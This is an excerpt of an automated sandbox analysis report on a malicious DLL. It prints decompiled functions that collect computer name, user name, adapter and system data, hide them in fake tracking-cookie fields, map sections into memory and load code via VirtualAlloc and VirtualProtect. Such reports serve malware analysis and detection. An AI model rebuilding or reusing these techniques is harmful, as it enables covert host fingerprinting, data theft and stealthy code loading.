                                                  				 *((long long*)(_t34 + 0x18)) = __rbp;
                                                  				 *((long long*)(_t34 + 0x20)) = __rsi;
                                                  				 *(_t34 + 0x10) =  *(_t34 + 0x10) & 0;
                                                  				LoadLibraryA(_t67); // executed
                                                  				GetProcAddress(_t64);
                                                  				_t54 = _t34;
                                                  				if (_t34 == 0) goto 0x800013df;
                                                  				_t16 =  *_t54(); // executed
                                                  				if (_t16 != 0x6f) goto 0x800013df;
                                                  				if (__rbx == 0) goto 0x800013df;
                                                  				GetProcessHeap();
                                                  				HeapAlloc(??, ??, ??);
                                                  				if (_t34 == 0) goto 0x800013df;
                                                  				_t19 =  *_t54(); // executed
                                                  				if (_t19 == 0) goto 0x80001414;
                                                  				GetProcessHeap();
                                                  				HeapFree(??, ??, ??);
                                                  				r9d = 1;
                                                  				return E00000001180001578(0, _t34, __rbx, __rcx, L"; _gid=", _t34, 0x800070bc, _t62, _t63, _t48);
                                                  			}

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                  • Associated: 00000005.00000002.946703468.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946741343.0000000180006000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946746318.0000000180008000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$Process$AdaptersFreeInfo$AddressAllocLibraryLoadProc
                                                  • String ID: ; _gid=$GetAdaptersInfo$IPHLPAPI.DLL
                                                  • API String ID: 3866128989-336904856
                                                  • Opcode ID: 7598de9b6775fabc65e146ea8b68a20f653f2bb1abdfd2dc1ec96b8558cd00fe
                                                  • Instruction ID: b75e3b5367209cd78c64b13d950b78932923334006a58f125620b5977970df53
                                                  • Opcode Fuzzy Hash: 7598de9b6775fabc65e146ea8b68a20f653f2bb1abdfd2dc1ec96b8558cd00fe
                                                  • Instruction Fuzzy Hash: 55317872600B88DAEB96DB22F4443D973A1AB4DBC5F48C025EA0D0A765DF38C64EC300
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                  • Associated: 00000005.00000002.946703468.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946741343.0000000180006000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946746318.0000000180008000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$Process$Free$AddressAllocAllocateInformationLibraryLoadProcQuerySystem
                                                  • String ID: NTDLL.DLL$ZwQuerySystemInformation
                                                  • API String ID: 2948972359-2445179936
                                                  • Opcode ID: 4b7823a0472f10f71a3871ae1883ce576c12e5eff67ca52907e33789a440dd5d
                                                  • Instruction ID: c553ab603bbb7ea155e402bcf953277eb51bc389a09fd2bd74e1016edb044849
                                                  • Opcode Fuzzy Hash: 4b7823a0472f10f71a3871ae1883ce576c12e5eff67ca52907e33789a440dd5d
                                                  • Instruction Fuzzy Hash: 5B313E72715A89C6FADADB56A8043D972A1AB4CBC2F48C034FB0957754EF3CCA4D8705
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 44%
                                                  			E00000001180002018(void* __eax, long long __rbx, void* __rcx, signed int __rdx, long long __rdi, long long __rsi) {
                                                  				void* __rbp;
                                                  				int _t34;
                                                  				void* _t37;
                                                  				signed long long _t49;
                                                  				signed long long _t52;
                                                  				void* _t83;
                                                  				WCHAR* _t85;
                                                  				void* _t86;
                                                  				signed long long _t88;
                                                  				void* _t89;
                                                  				WCHAR* _t98;
                                                  				WCHAR* _t100;
                                                  
                                                  				_t49 = _t88;
                                                  				 *((long long*)(_t49 + 0x10)) = __rbx;
                                                  				 *((long long*)(_t49 + 0x18)) = __rsi;
                                                  				 *((long long*)(_t49 + 0x20)) = __rdi;
                                                  				_t86 = _t49 - 0x168;
                                                  				_t89 = _t88 - 0x250;
                                                  				 *((intOrPtr*)(_t86 + 0x170)) = 0x100;
                                                  				_t83 = __rcx;
                                                  				__imp__GetComputerNameExW(); // executed
                                                  				if (__eax != 0) goto 0x8000206a;
                                                  				 *((intOrPtr*)(_t89 + 0x40)) = 0x78;
                                                  				E000000011800014B4(_t49, __rbx, __rcx, L"; _u=", __rcx, _t86, _t89 + 0x40);
                                                  				 *((intOrPtr*)(_t86 + 0x170)) = 0x100;
                                                  				_t52 = _t49; // executed
                                                  				_t34 = GetUserNameW(_t100); // executed
                                                  				if (_t34 != 0) goto 0x800020a9;
                                                  				 *((intOrPtr*)(_t89 + 0x40)) = 0x78;
                                                  				E000000011800014B4(_t49, _t52, _t83 + _t52 * 2, ":", _t83, _t86, _t89 + 0x40);
                                                  				_t53 = _t52 + _t49;
                                                  				_t37 = E00000001180001C28(E000000011800014B4(_t49, _t52 + _t49, _t83 + (_t52 + _t49) * 2, ":", _t83, _t86, __rdx), 5, _t53 + _t49, _t89 + 0x20);
                                                  				r14d = _t37;
                                                  				if (_t37 == 0) goto 0x80002144;
                                                  				r9d =  *((intOrPtr*)(_t89 + 0x20));
                                                  				wsprintfW(_t98);
                                                  				goto 0x8000213d;
                                                  				r9d =  *((intOrPtr*)(_t89 + 0x20 + __rdx * 4));
                                                  				wsprintfW(_t85);
                                                  				if (__rdx + 1 - _t98 < 0) goto 0x80002117;
                                                  				goto 0x80002153;
                                                  				r9d = 0;
                                                  				return wsprintfW(??, ??);
                                                  			}

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                  • Associated: 00000005.00000002.946703468.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946741343.0000000180006000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946746318.0000000180008000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wsprintf$Name$ComputerUser
                                                  • String ID: %s%u$; __io=$; _u=$x
                                                  • API String ID: 4095488650-3513353778
                                                  • Opcode ID: f1478dc860690c2674d3b930d555615b59b4ecc490b00cfe724bc35653b41c2f
                                                  • Instruction ID: 7d741998cccdb29629df25af753f6537b3149e73fb9b8afa304b05458abafeeb
                                                  • Opcode Fuzzy Hash: f1478dc860690c2674d3b930d555615b59b4ecc490b00cfe724bc35653b41c2f
                                                  • Instruction Fuzzy Hash: A73149B2704A8992EBA2CB11E8443D97370F75C7C5F948126EA4D5B665EF3CC60EC740
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                  • Associated: 00000005.00000002.946703468.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946741343.0000000180006000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946746318.0000000180008000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$NameProcess$AccountFreeLookup$AllocComputerErrorLast
                                                  • String ID:
                                                  • API String ID: 2409119217-0
                                                  • Opcode ID: a34f698e1f708103aaef8de00ac60e6572fcc8d6c95b913e3dba122220aa4ed4
                                                  • Instruction ID: bccd91b441821ca56803e91b7d04f4d1ec65d623121010ca1dafda4b918fcf64
                                                  • Opcode Fuzzy Hash: a34f698e1f708103aaef8de00ac60e6572fcc8d6c95b913e3dba122220aa4ed4
                                                  • Instruction Fuzzy Hash: 06315E72701B498AEB62DF74E4443D933E5EB4DBC9F548026EA4D56A58EF38C60CC340
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 56%
                                                  			E00000001180002174(void* __eax, void* __eflags, signed int __rax, signed int __rbx, signed int __rcx, signed int __rdx, long long __rdi, void* __rsi, void* __r11, void* __r14) {
                                                  				void* __rbp;
                                                  				void* _t27;
                                                  				signed long long _t51;
                                                  				void* _t72;
                                                  				long _t75;
                                                  				void* _t76;
                                                  				void* _t78;
                                                  				void* _t85;
                                                  
                                                  				_t74 = __rsi;
                                                  				_t52 = __rbx;
                                                  				 *((long long*)(_t78 + 0x18)) = __rbx;
                                                  				 *((long long*)(_t78 + 0x20)) = __rdi;
                                                  				_t76 = _t78 - 0x57;
                                                  				_t4 = _t52 + 4; // 0x4
                                                  				asm("rdtsc");
                                                  				_t51 = __rax | __rdx << 0x00000020;
                                                  				_t54 = __rbx << 0x00000010 | __rcx;
                                                  				SleepEx(_t75); // executed
                                                  				_t72 = __rdi - 1;
                                                  				if (__eflags != 0) goto 0x80002190;
                                                  				wsprintfW(??, ??);
                                                  				E00000001180002428(_t76 - 0x29, __rbx << 0x00000010 | __rcx);
                                                  				_t9 = _t72 + 1; // 0x4
                                                  				E00000001180002860( *((intOrPtr*)(_t76 + 0x17)), _t9, _t4, _t51, __rbx << 0x00000010 | __rcx, __rsi, _t76, _t76 - 0x69, _t85);
                                                  				if (_t51 == 0) goto 0x8000224e;
                                                  				if (E00000001180001D80(_t9, _t51, _t51, _t54, _t76 + 0x1b, _t51, _t74, _t76, _t76 + 0x67, _t76 + 0x6f, __r11, __r14) == 0) goto 0x8000224e;
                                                  				if ( *((intOrPtr*)(_t76 + 0x6f)) - 0x400 < 0) goto 0x8000224e;
                                                  				_t27 = E00000001180001198(_t9,  *((intOrPtr*)(_t76 + 0x67)),  *((intOrPtr*)(_t76 + 0x6f)), _t76 + 0x67);
                                                  				if ( *((intOrPtr*)(_t76 + 0x67)) == 0) goto 0x80002232;
                                                  				GetProcessHeap();
                                                  				HeapFree(??, ??, ??);
                                                  				E00000001180001B5C(_t27, _t51,  *((intOrPtr*)(_t76 + 0x67)), _t76 - 0x69, _t74);
                                                  				if (_t51 == 0) goto 0x8000224e;
                                                  				E00000001180002480(_t51, _t76 + 0x1b, _t51);
                                                  				return 0;
                                                  			}

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                  • Associated: 00000005.00000002.946703468.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946741343.0000000180006000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.946746318.0000000180008000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$FreeProcessSleepwsprintf
                                                  • String ID: %016IX
                                                  • API String ID: 2187706517-1811457740
                                                  • Opcode ID: 22af208baba866085d29c64b7848b84a41cee80f8a0e70526e1cf0428296f31c
                                                  • Instruction ID: 661cb7bdf0d2a5cc3032a3c802704869fbd6bc5f67ca47283b56c7d180ea033d
                                                  • Opcode Fuzzy Hash: 22af208baba866085d29c64b7848b84a41cee80f8a0e70526e1cf0428296f31c
                                                  • Instruction Fuzzy Hash: E9214F72300A499AEB92DFA1D9543DD33A6E7487C4F888425BE0D6B699EE38D64CC350
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 100%
                                                  			E000007FE7FEF74D5FF9(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __rdx, void* __r10, void* __r11, void* __r15, signed int _a80, intOrPtr _a308, intOrPtr _a312, intOrPtr _a316, intOrPtr _a320, intOrPtr _a324, intOrPtr _a328, intOrPtr _a332, intOrPtr _a336, intOrPtr _a340, intOrPtr _a344) {
                                                  				intOrPtr _t40;
                                                  				void* _t57;
                                                  
                                                  				_a344 = 0x18f;
                                                  				_a344 = _a344 + 0xff;
                                                  				_a324 = 0x1d29;
                                                  				_a324 = _a324 + 0x3c;
                                                  				if (__ecx == __ecx) goto 0xf74d6042;
                                                  				_a336 = 0x7b;
                                                  				_a336 = _a336;
                                                  				if (__edx == __edx) goto 0xf74d608a;
                                                  				_a328 = 6;
                                                  				_a328 = _a328 + 0x27;
                                                  				if (__ebx == __ebx) goto 0xf74d6059;
                                                  				_a332 = 0x35;
                                                  				_a332 = _a332 + 0x17;
                                                  				if (__eax == __eax) goto 0xf74d602b;
                                                  				_a312 = 0x19cc;
                                                  				_a312 = _a312 + 0xa0;
                                                  				if (__ebx == __ebx) goto 0xf74d60a5;
                                                  				_a340 = 0xd9;
                                                  				_a340 = _a340 + 0x81;
                                                  				goto E000007FE7FEF74D5FF9;
                                                  				_a316 = 0x5c;
                                                  				_a316 = _a316 + 0x8f;
                                                  				if (__ecx == __ecx) goto 0xf74d60d7;
                                                  				_a308 = 7;
                                                  				_a308 = _a308 + 0x12;
                                                  				if (__ecx == __ecx) goto 0xf74d6070;
                                                  				_a320 = 0x24b;
                                                  				_a320 = _a320 + 0x30;
                                                  				if (__edx == __edx) goto L1;
                                                  				_t40 =  *((intOrPtr*)(_t57 + 0x70 + _a80 * 4));
                                                  				if (_t40 - 0x1f4 <= 0) goto 0xf74d60f2;
                                                  				return _t40;
                                                  			}






                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946754973.000007FEF74D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000007FEF74D0000, based on PE: true
• Associated: 00000005.00000002.946750732.000007FEF74D0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.946799509.000007FEF7529000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7fef74d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: CreateSection
                                                  • String ID: $$'$<
                                                  • API String ID: 2449625523-1052150772
                                                  • Opcode ID: a827bfe900c49c1c2808823daf063abfa26f5a14f1beb8bf1ce44c1864846899
                                                  • Instruction ID: 8932e8488b6f6d80a9fa20072dfc919a9c347f9019337c7e8c012e66ea0445a5
                                                  • Opcode Fuzzy Hash: a827bfe900c49c1c2808823daf063abfa26f5a14f1beb8bf1ce44c1864846899
                                                  • Instruction Fuzzy Hash: 2021E976C1C2C2CBE6B08F54A4483BFB7E1E385394F600539A2CA469A9D7BDE4449F02
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

Control-flow graph (rendered graph not preserved; summary of its node list):
• Function start: 0x7fef74d5fe6; basic blocks span 0x7fef74d5fdd-0x7fef74d66db
• NtCreateSection called in block 0x7fef74d620e-0x7fef74d6215
• NtMapViewOfSection called in block 0x7fef74d66a7-0x7fef74d66bb
                                                  C-Code - Quality: 100%
                                                  			E000007FE7FEF74D5FE6(void* __ebx, void* __ecx, void* __edx, void* __rdx, void* __r10, void* __r11, void* __r15, signed int _a80, intOrPtr _a88, intOrPtr _a308, intOrPtr _a312, intOrPtr _a316, intOrPtr _a320, intOrPtr _a324, intOrPtr _a328, intOrPtr _a332, intOrPtr _a336, intOrPtr _a340, intOrPtr _a344, intOrPtr _a448) {
                                                  				intOrPtr _t41;
                                                  
                                                  				if (_a88 < 0) goto 0xf74d5fdd;
                                                  				_t41 = _a448;
                                                  				_a344 = 0x18f;
                                                  				_a344 = _a344 + 0xff;
                                                  				_a324 = 0x1d29;
                                                  				_a324 = _a324 + 0x3c;
                                                  				if (__ecx == __ecx) goto 0xf74d6042;
                                                  				_a336 = 0x7b;
                                                  				_a336 = _a336;
                                                  				if (__edx == __edx) goto 0xf74d608a;
                                                  				_a328 = 6;
                                                  				_a328 = _a328 + 0x27;
                                                  				if (__ebx == __ebx) goto 0xf74d6059;
                                                  				_a332 = 0x35;
                                                  				_a332 = _a332 + 0x17;
                                                  				if (_t41 == _t41) goto 0xf74d602b;
                                                  				_a312 = 0x19cc;
                                                  				_a312 = _a312 + 0xa0;
                                                  				if (__ebx == __ebx) goto 0xf74d60a5;
                                                  				_a340 = 0xd9;
                                                  				_a340 = _a340 + 0x81;
                                                  				goto L1;
                                                  				_a316 = 0x5c;
                                                  				_a316 = _a316 + 0x8f;
                                                  				if (__cx == __cx) goto 0xf74d60d7;
                                                  				_a308 = 7;
                                                  				_a308 = _a308 + 0x12;
                                                  				if (__ch == __ch) goto 0xf74d6070;
                                                  				_a320 = 0x24b;
                                                  				_a320 = _a320 + 0x30;
                                                  				if (__dl == __dl) goto L2;
                                                  				__eax =  *((intOrPtr*)(__rsp + 0x70 + _a80 * 4));
                                                  				if (__eax - 0x1f4 <= 0) goto 0xf74d60f2;
                                                  				_t38 = __r10;
                                                  				__r10 = __rsp;
                                                  				__rsp = _t38;
                                                  				__r11 = __r11 << 0x40;
                                                  				return __eax;
                                                  			}





                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946754973.000007FEF74D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000007FEF74D0000, based on PE: true
• Associated: 00000005.00000002.946750732.000007FEF74D0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.946799509.000007FEF7529000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7fef74d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: CreateSection
                                                  • String ID:
                                                  • API String ID: 2449625523-0
                                                  • Opcode ID: 8b32971e4af457eda586907c53b90aeb09a8bd07261add21a48acce25afcaa35
                                                  • Instruction ID: 3e9ba125b97d1e202216d4ae020126a8f30c6ffa4e134db01a81879d11b5550d
                                                  • Opcode Fuzzy Hash: 8b32971e4af457eda586907c53b90aeb09a8bd07261add21a48acce25afcaa35
                                                  • Instruction Fuzzy Hash: 2311987292C6C5C6E7F09F54E0547ABABE2F384394F500035F6DA46AA8DB7DD5848F02
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

Control-flow graph (rendered graph not preserved; summary of its node list):
• Function start: 0x7fef74d2cf7; basic blocks span 0x7fef74d2cda-0x7fef74d364b
• CryptCreateHash called in block 0x7fef74d2cda-0x7fef74d2cf2
• CryptAcquireContextW called in block 0x7fef74d2d01-0x7fef74d2d0d
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946754973.000007FEF74D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000007FEF74D0000, based on PE: true
• Associated: 00000005.00000002.946750732.000007FEF74D0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.946799509.000007FEF7529000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7fef74d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Crypt$AcquireContextCreateHash
                                                  • String ID:
                                                  • API String ID: 1914063823-0
                                                  • Opcode ID: 9328c7aaf945543188686a8cb83c328452d0d61bf2d104c301b4851cb1c44e76
                                                  • Instruction ID: c9ec193665597158924b64c56011d64866868064075c770999a4e8ded5d0856a
                                                  • Opcode Fuzzy Hash: 9328c7aaf945543188686a8cb83c328452d0d61bf2d104c301b4851cb1c44e76
                                                  • Instruction Fuzzy Hash: 76F0FE22E2D547D2F6F08F11E4103BF92E1E795740F540435F6CF42AA8EB3DE955A600
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

Control-flow graph (rendered graph not preserved; summary of its node list):
• Function start: 0x7fef74d2cca; basic blocks span 0x7fef74d2cca-0x7fef74d36e5
• CryptCreateHash called in block 0x7fef74d2cca-0x7fef74d2f9d
• Internal call to 0x7fef74d7947 from block 0x7fef74d36b0-0x7fef74d36bf
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946754973.000007FEF74D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000007FEF74D0000, based on PE: true
• Associated: 00000005.00000002.946750732.000007FEF74D0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.946799509.000007FEF7529000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7fef74d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: CreateCryptHash
                                                  • String ID:
                                                  • API String ID: 4184778727-0
                                                  • Opcode ID: 1b2df4a2d971ec85693729c80128cdf9c680fc0664a4aaac409bd98b765b1bdf
                                                  • Instruction ID: a7b62e0e4bf6e52d8e0cce57ed447bc69e40cf86a518eceb9d84c833f6ae453a
                                                  • Opcode Fuzzy Hash: 1b2df4a2d971ec85693729c80128cdf9c680fc0664a4aaac409bd98b765b1bdf
                                                  • Instruction Fuzzy Hash: FD217162D2C182C6F6F08E94D0043BB92E1EB91300F940039F6CB87BB4EA3DE8419B01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946754973.000007FEF74D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000007FEF74D0000, based on PE: true
• Associated: 00000005.00000002.946750732.000007FEF74D0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.946799509.000007FEF7529000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7fef74d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: CreateCryptHash
                                                  • String ID:
                                                  • API String ID: 4184778727-0
                                                  • Opcode ID: 6c0d0b01144992e9ee5506c314bfe315ee5ded7aa6eeff1a2f840e8b65ebe874
                                                  • Instruction ID: 04ff2314b4382c927438a901e625bcf0217fa51f0f41517509c9b2c9e98b86a7
                                                  • Opcode Fuzzy Hash: 6c0d0b01144992e9ee5506c314bfe315ee5ded7aa6eeff1a2f840e8b65ebe874
                                                  • Instruction Fuzzy Hash: EFD09212E2D14BC2FAE44A12A92073B85D2ABE1745F249031F5DA469A8DA3CE8119200
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 40%
                                                  			E00000001180002860(void* __ecx, void* __edx, void* __edi, long long* __rax, long long __rbx, long long __rsi, long long __rbp, void* __r8, void* __r9, long long _a8, long long _a16, long long _a24) {
                                                  				void* __rdi;
                                                  				int _t23;
                                                  				int _t24;
                                                  				void* _t30;
                                                  				long long* _t41;
                                                  				void* _t46;
                                                  				signed long long _t47;
                                                  				signed long long _t48;
                                                  				long long* _t69;
                                                  				void* _t71;
                                                  
                                                  				_t41 = __rax;
                                                  				_a8 = __rbx;
                                                  				_a16 = __rbp;
                                                  				_a24 = __rsi;
                                                  				_t71 = __r8;
                                                  				GetProcessHeap();
                                                  				r8d = 0x2001;
                                                  				RtlAllocateHeap(??, ??, ??); // executed
                                                  				_t69 = __rax;
                                                  				if (__rax == 0) goto 0x80002959;
                                                  				r9d = __ecx;
                                                  				_t23 = wsprintfW(??, ??);
                                                  				r9d = __edx;
                                                  				_t24 = wsprintfW(??, ??);
                                                  				r9d = E00000001180001484(_t24, __rax, L"%s%u");
                                                  				_t46 = _t23 + _t24 + wsprintfW(??, ??);
                                                  				r9d = E0000000118000108C(__rax, _t46, __r8);
                                                  				_t47 = _t46 + wsprintfW(??, ??);
                                                  				E00000001180001904(__rax, _t47, __rax + _t47 * 2, _t71);
                                                  				_t48 = _t47 + __rax;
                                                  				_t30 = E000000011800027B4(__rax, _t48, __rax + _t48 * 2);
                                                  				_t49 = _t48 + __rax;
                                                  				E00000001180002018(_t30, _t48 + __rax, __rax + (_t48 + __rax) * 2, _t71, __rax, _t71);
                                                  				return E0000000118000133C(_t49 + _t41, _t69 + (_t49 + _t41) * 2, _t71, ":");
                                                  			}














                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000005.00000002.946703468.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.946741343.0000000180006000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.946746318.0000000180008000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wsprintf$Heap$Process$AddressLibraryLoadProc$AdaptersAllocInfoName$AllocateComputerCount64FreeInformationQuerySystemTickUser
                                                  • String ID: %s%u$Cookie: __gads=
                                                  • API String ID: 392523097-3007860590
                                                  • Opcode ID: 331763b53d6f8557935e9ebf42fdd2c7f373a1b19adadbe0eaccf4172c03b777
                                                  • Instruction ID: 8f6dff4a45bc758f9ad86f1329c8408aa2d07b8871dc2bc0e96f96c00fe38273
                                                  • Opcode Fuzzy Hash: 331763b53d6f8557935e9ebf42fdd2c7f373a1b19adadbe0eaccf4172c03b777
                                                  • Instruction Fuzzy Hash: 2C214872740A0996EB92DB55F8543E87360BB5CBC1F848129AB4D57772EE3CC62DC340
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

Control-flow graph (rendered graph not preserved; summary of its node list):
• Function start: 0x180001bd4; basic blocks span 0x180001bd4-0x180001c25
• LoadLibraryA and GetProcAddress called in block 0x180001bd4-0x180001c0c
• GetNativeSystemInfo called in block 0x180001c0e-0x180001c13, which is conditional (the entry block can branch straight to the exit block 0x180001c15-0x180001c25)
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000005.00000002.946703468.0000000180000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.946741343.0000000180006000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.946746318.0000000180008000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressInfoLibraryLoadNativeProcSystem
                                                  • String ID: GetNativeSystemInfo$KERNEL32.DLL
                                                  • API String ID: 2103483237-4162215167
                                                  • Opcode ID: 422b05c43dcb4eb9de9b7d23b9406151622cf17c3d48ce90b7700ffe9165f4bc
                                                  • Instruction ID: 8e61e42ac17d5e92d5409a7507b4c0ea04a19fa1e2651f3f55c474f49308d06d
                                                  • Opcode Fuzzy Hash: 422b05c43dcb4eb9de9b7d23b9406151622cf17c3d48ce90b7700ffe9165f4bc
                                                  • Instruction Fuzzy Hash: 0BE06D72B24509D2EB93EB20E8543D93360FB9C780F848221A54E026A4EF2CD78DC740
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph (rendered image not reproduced; legend: Executed / Not Executed). Function spanning basic blocks 120000-120616; the entry block calls 120618 six times, and the graph shows calls to GetNativeSystemInfo (block 120127-120159), VirtualAlloc (block 12015f-12017b), LoadLibraryA (block 1202f1-12030a) and VirtualProtect (block 1204bd-1204ca).
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946492105.0000000000120000.00000040.10000000.00040000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_120000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Virtual$AllocInfoLibraryLoadNativeProtectSystem
                                                  • String ID:
                                                  • API String ID: 395219687-0
                                                  • Opcode ID: dd72a9d3825b757cb599c52874617b57d3dfc330cdb9a130d1801265dc8a93a8
                                                  • Instruction ID: b69346f41ff606e319130c8a8d758b8acfcb3c2cfd8767c1206f7523143e8fcd
                                                  • Opcode Fuzzy Hash: dd72a9d3825b757cb599c52874617b57d3dfc330cdb9a130d1801265dc8a93a8
                                                  • Instruction Fuzzy Hash: 10120831618E298FCB2EDE58E85567573E1FB58311B25472DD88BC3253EB34EC638681
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

